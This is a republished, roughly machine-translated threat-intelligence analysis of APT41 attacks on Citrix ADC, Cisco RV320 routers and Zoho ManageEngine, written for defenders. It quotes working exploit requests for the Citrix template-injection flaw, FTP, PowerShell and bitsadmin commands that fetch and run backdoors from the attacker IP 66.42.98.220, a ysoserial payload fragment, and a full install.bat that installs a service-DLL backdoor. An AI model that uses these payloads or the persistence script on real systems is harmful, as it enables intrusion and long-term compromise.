Shulou(Shulou.com)05/31 Report--

This article to share with you is about how to carry out APT41 multi-vulnerability network attack analysis, Xiaobian think quite practical, so share to everyone to learn, I hope you can read this article after some harvest, not much to say, follow Xiaobian to see it.

Exploitability CVE-2019-19781 (Citrix Application Delivery Controller [ADC])

Starting January 20, 2020, APT41 uses IP address 66.42.98 [.] 220 Attempt to exploit vulnerability CVE-2019-19781 (released December 17, 2019).

Timeline:

The initial exploitation of CVE-2019-19781 occurred on January 20, 2020 and January 21, 2020, with the command 'file /bin/pwd' executed. First, it will confirm whether there are vulnerabilities in the system and whether relevant vulnerability mitigation measures have been deployed. Second, it returns information related to the target architecture, providing information for the subsequent deployment of APT41 backdoors.

All observed requests are executed only for Citrix devices, APT41 operates with a list of known devices.

HTTP POST example:

POST /vpns/portal/scripts/newbm.pl HTTP/1.1

Host: [redacted]

Connection: close

Accept-Encoding: gzip, deflate

Accept: */*

User-Agent: python-requests/2.22.0

NSC_NONCE: nsroot

NSC_USER: ../../../ netscaler/portal/templates/[redacted]

Content-Length: 96

url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %]

APT41 activity was suspended between January 23 and February 1, and APT41 began using the CVE-2019-19781 vulnerability on February 1, with payloads downloaded via FTP. APT41 Execute the command '/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.] 220/bsd', linked to 66.42.98 [.] 220, log in to the FTP server with the username " test" and password, and download the " bsd" payload (possibly a backdoor).

HTTP POST example:

POST /vpn/../ vpns/portal/scripts/newbm.pl HTTP/1.1Accept-Encoding: identityContent-Length: 147Connection: closeNsc_User: ../../../ netscaler/portal/templates/[redacted]User-Agent: Python-urllib/2.7Nsc_Nonce: nsrootHost: [redacted]Content-Type: application/x-www-form-urlencodedurl=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.] 220/bsd`') %]

The utilization of CVE-2019-19781 increased significantly on February 24 and February 25, with only the payload name changing.

POST /vpn/../ vpns/portal/scripts/newbm.pl HTTP/1.1Accept-Encoding: identityContent-Length: 145Connection: closeNsc_User: ../../../ netscaler/portal/templates/[redacted]User-Agent: Python-urllib/2.7Nsc_Nonce: nsrootHost: [redacted]Content-Type: application/x-www-form-urlencodedurl=http://example.com&title= [redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.] 220/un`') %]Cisco Router

APT41 successfully attacked a Cisco RV320 router at a telecommunications organization and downloaded a 64-bit MIPS payload named " fuc"(MD5: 155e98e5ca8d662fad7dc84187340cbc). The Metasploit module combines two CVEs (CVE-2019-1653 and CVE-2019-1652) to enable remote code execution on Cisco RV320 and RV325 small business routers and download payloads using wget.

66.42.98 [.] 220 also hosts the file http://66.42.98[.] 220/test/1.txt (MD5: c0 c467c8e9b2046d7053642cc9bdd57d) reads " cat/etc/flash/etc/nk_sysconfig" and is executed on Cisco RV320 routers to display the current configuration.

Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability

Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability

CVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability)

On March 5, researchers released the CVE-2020-10189 validation code. APT41 uses 91.208.184 from March 8 [.] 78 to attempt to exploit Zoho ManageEngine vulnerability, the payload (install.bat and storesyncsvc.dll) has two different variations. In the first variant, the vulnerability CVE-2020-10189 is used to upload directly to "logger.zip," which contains a set of commands that can be downloaded using PowerShell and executed as install.bat and storesyncsvc.dll.

java/lang/Runtime

getRuntime

()Ljava/lang/Runtime;

Xcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.] 220:12345/test/install.bat','C:\

Windows\Temp\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.] 220:12345/test/storesyncsvc.dll','

C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.bat

'(Ljava/lang/String;)Ljava/lang/Process;

StackMapTable

ysoserial/Pwner76328858520609

Lysoserial/Pwner76328858520609;

In the second version APT41 took advantage of Microsoft BITS Admin tool from 66.42.98 [.] 220 port 12345 download install.bat (MD5: 7966c2c546b71e800397a67f942858d0).

Parent Process: C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exeProcess Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.] 220:12345/test/install.bat C:\Users\Public\install.bat

Both variants use an install.bat batch file to install a file named storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f).

install.bat Content:

@echo offset "WORK_DIR=C:\Windows\System32"set "DLL_NAME=storesyncsvc.dll"set "SERVICE_NAME=StorSyncSvc"set "DISPLAY_NAME=Storage Sync Service"set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly. " sc stop %SERVICE_NAME%sc delete %SERVICE_NAME%mkdir %WORK_DIR%copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Yreg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "%SERVICE_NAME%" /t REG_MULTI_SZ /d "%SERVICE_NAME%" /fsc create "%SERVICE_NAME%" binPath= "%SystemRoot%\system32\svchost.exe -k %SERVICE_NAME%" type= share start= auto error= ignore DisplayName= "%DISPLAY_NAME%"SC failure "%SERVICE_NAME%" reset= 86400 actions= restart/60000/restart/60000/restart/60000sc description "%SERVICE_NAME%" "%DESCRIPTION%"reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /freg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "%WORK_DIR%\%DLL_NAME%" /fnet start "%SERVICE_NAME%"

Connect with c2 services:

GET /jquery-3.3.1.min.js HTTP/1.1Host: cdn.bootcss.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://cdn.bootcss.com/Accept-Encoding: gzip, deflateCookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYMDA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLIUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-Alive Cache-Control: no-cache

Within hours of the exploit, APT41 downloaded an auxiliary backdoor with a different C2 address using the storecyncsvc.dll BEACON backdoor, and then downloaded 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c). 2.exe is VMProtected Meterpreter downloader for downloading Cobalt Strike BEACON shellcode. The group uses multiple intrusions to delay analysis of its other tools.

APT41 scanning and attacks in this activity reflect the faster and faster exploitation of vulnerabilities, and the scope of target information collection is gradually expanding. APT41 successfully used CVE-2019-3396 (Atlassian Confluence) to attack a university in the United States. It can be seen that APT41 is engaged in espionage activities as well as network activities motivated by economic interests.

The above is how to carry out APT41 multi-vulnerability network attack analysis, Xiaobian believes that some knowledge points may be our daily work will see or use. I hope you can learn more from this article. For more details, please pay attention to the industry information channel

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.